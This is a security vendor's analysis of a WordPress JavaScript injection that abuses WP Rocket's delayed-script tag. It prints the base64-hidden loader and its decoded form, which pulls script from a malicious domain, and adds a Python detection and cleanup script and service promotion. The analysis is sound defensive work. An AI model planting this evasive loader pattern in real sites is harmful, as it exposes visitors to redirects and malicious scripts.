One of our security analysts discovered this new JavaScript malware injection on a compromised website we were cleaning.
The injection abuses the “rocketlazyloadscript” script type that the WordPress WP Rocket plugin uses for its Delay JavaScript Execution feature, so the malicious code only runs once WP Rocket's loader activates it after user interaction. That delay keeps the payload stealthy and undetected for as long as possible.
It is now spreading quickly and we are seeing it on more websites every day. Attackers are actively compromising websites and injecting the malicious JavaScript into both files and the database; most of the injections we have found live in the wp_options table, so the code has to be removed from the database as well as from every infected file.
encodediagnosisrelish[.]com is the malicious domain we have seen most often in this campaign so far. It was registered only recently, on April 25th 2024, as the WHOIS record below shows:
Domain Name: ENCODEDIAGNOSISRELISH[.]COM
Registry Domain ID: 2875559155_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.enom.com
Registrar URL: http://www.enomdomains.com
Updated Date: 2024-04-25T14:41:30Z
Creation Date: 2024-04-25T14:41:30Z
Registry Expiry Date: 2025-04-25T14:41:30Z
To illustrate what the encodediagnosisrelish[.]com injection looks like on an infected page, here is an example taken from one of the compromised sites, together with a screenshot:
<script type="rocketlazyloadscript">document.write(atob("PHNjcmlwdCH..SKIPPED.."));</script>
As the code snippet and screenshot above show, the malicious part is base64 encoded and hidden inside a script tag with type="rocketlazyloadscript". Browsers do not execute a script whose type they do not recognise, so the payload stays inert until WP Rocket's delay-JS loader rewrites the type after the first user interaction (scroll, click, key press); only then is the decoded code written into the page with document.write. This is what lets the injection remain stealthy and undetected for as long as possible: a scanner that loads the page without interacting with it never sees the payload run.
This is what the JavaScript looks like after base64-decoding it:
<script type='text/javascript' src='//encodediagnosisrelish[.]com/71/0d/40/710d40f81b147f8a985e1731b1741b0c.js'></script>
The script loaded from that domain then redirects visitors to random spam websites and serves ads and popups.
How to remove this infection?
Search your database (in particular the wp_options table) and your files for the code shown above or for the domain, and remove every occurrence. Then update all plugins and themes in use, delete the unused ones, change all passwords (WordPress users, FTP/SFTP, database and hosting control panel), and put security measures in place to protect the website from future attacks.
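As an added example (not code from the original post or from MoeSec.com's own tooling), the following Python script shows the search-and-decode step of the cleanup: it finds script tags of type rocketlazyloadscript, flags only those whose inline body base64-decodes a payload with atob() and writes it into the page, decodes the payload to reveal the hidden loader domain, and strips the flagged tags while leaving WP Rocket's own delayed scripts in place. The sample theme file and wp_options values are constructed for this demonstration, the decoded payload is the one quoted above and is re-encoded at runtime so the script runs offline, and the distinction between a legitimate delayed tag (data-rocket-* attributes, no inline decoder) and the injection is a heuristic, not a guarantee.

```python
import base64
import binascii
import re

# Constructed sample data (not from a real site): the decoded loader quoted in the
# article, base64-encoded here at runtime, planted in a theme file and in wp_options
# values next to a legitimate WP Rocket-delayed script.
DECODED_PAYLOAD = ("<script type='text/javascript' "
                   "src='//encodediagnosisrelish.com/71/0d/40/710d40f81b147f8a985e1731b1741b0c.js'>"
                   "</script>")
INJECTED_TAG = ('<script type="rocketlazyloadscript">document.write(atob("%s"));</script>'
                % base64.b64encode(DECODED_PAYLOAD.encode()).decode())

# WP Rocket's own rewritten tag: data-rocket-* attributes, no inline decoder.
LEGIT_TAG = ('<script type="rocketlazyloadscript" data-rocket-type="text/javascript" '
             'data-rocket-src="/wp-content/themes/example/assets/app.js"></script>')

SAMPLE_SOURCES = {  # hypothetical file path and option names
    "wp-content/themes/example/header.php": "<head>\n%s\n%s\n</head>" % (LEGIT_TAG, INJECTED_TAG),
    "wp_options:widget_custom_html": "<p>Follow us</p>" + INJECTED_TAG,
    "wp_options:blogdescription": "Just another WordPress site",
}

SCRIPT_RE = re.compile(
    r'<script\b[^>]*\btype\s*=\s*["\']rocketlazyloadscript["\'][^>]*>(.*?)</script>',
    re.IGNORECASE | re.DOTALL)
ATOB_RE = re.compile(r'atob\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)')
HOST_RE = re.compile(r'src\s*=\s*["\']?(?:https?:)?//([^/"\'\s>]+)', re.IGNORECASE)


def decode_atob_args(body):
    """Base64-decode every atob("...") argument in a script body; skip malformed ones."""
    decoded = []
    for b64 in ATOB_RE.findall(body):
        try:
            decoded.append(base64.b64decode(b64).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue
    return decoded


def scan(content):
    """Return one finding per suspicious rocketlazyloadscript tag in content.

    Heuristic: a delayed tag whose inline body decodes base64 with atob() is
    flagged; WP Rocket's own tags carry the script in data-rocket-src or as
    plain inline code and have no such decoder, so they are left alone.
    """
    findings = []
    for m in SCRIPT_RE.finditer(content):
        body = m.group(1)
        if "atob(" not in body:
            continue
        payloads = decode_atob_args(body)
        hosts = sorted({h.lower() for p in payloads for h in HOST_RE.findall(p)})
        findings.append({"tag": m.group(0), "payloads": payloads, "hosts": hosts})
    return findings


def scan_sources(sources):
    """Map source name -> findings, keeping only sources with something suspicious."""
    result = {}
    for name, content in sources.items():
        found = scan(content)
        if found:
            result[name] = found
    return result


def clean(content):
    """Strip every flagged tag from content; return (cleaned_content, removed_count)."""
    removed = 0
    for f in scan(content):
        removed += content.count(f["tag"])
        content = content.replace(f["tag"], "")
    return content, removed


if __name__ == "__main__":
    for name, found in scan_sources(SAMPLE_SOURCES).items():
        for f in found:
            print("%s: hidden loader -> %s" % (name, ", ".join(f["hosts"])))
    cleaned, n = clean(SAMPLE_SOURCES["wp-content/themes/example/header.php"])
    print("removed %d tag(s); legitimate WP Rocket tag kept: %s" % (n, LEGIT_TAG in cleaned))
```

Run it over the site's files and over option values pulled from the database (for example with wp db query against wp_options), and review each finding before deleting anything: the point of the heuristic is to avoid stripping WP Rocket's legitimate delayed tags. Removing the tags does not replace reinstalling plugins and themes from clean copies, since the injection only tells you the site was compromised, not how.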
MoeSec.com’s Role in Combating Malware infection:
MoeSec.com, a trusted website security service provider, offers comprehensive protection against malware infections, including the encodediagnosisrelish[.]com injection described above. By employing state-of-the-art security measures, MoeSec.com helps website owners detect, remove, and prevent malware infections.
Let’s take a closer look at how MoeSec.com tackles the threat of encodediagnosisrelish[.]com:
1. Malware Detection:
MoeSec.com utilizes AI and heuristic scanning techniques to identify the presence of the encodediagnosisrelish[.]com malware or any abnormal behavior within a website's code. By conducting regular scans, the service can quickly detect potential threats and take appropriate action.
2. Malware Removal and Cleanup:
Upon identifying malware, MoeSec.com’s certified security experts promptly initiate the removal and cleanup process. This involves thoroughly cleaning the website’s files and database, eliminating injected malware, spam, phishing attempts, backdoors, and malicious users. Additionally, MoeSec.com ensures that the website is removed from all blacklists.
3. Website Firewall Protection:
To safeguard websites from future attacks, MoeSec.com deploys a cloud-based web application firewall (WAF). This security layer actively blocks malicious traffic and implements protective measures to prevent potential threats. By employing the latest security protocols, MoeSec.com fortifies websites against the encodediagnosisrelish[.]com campaign and other malware attacks.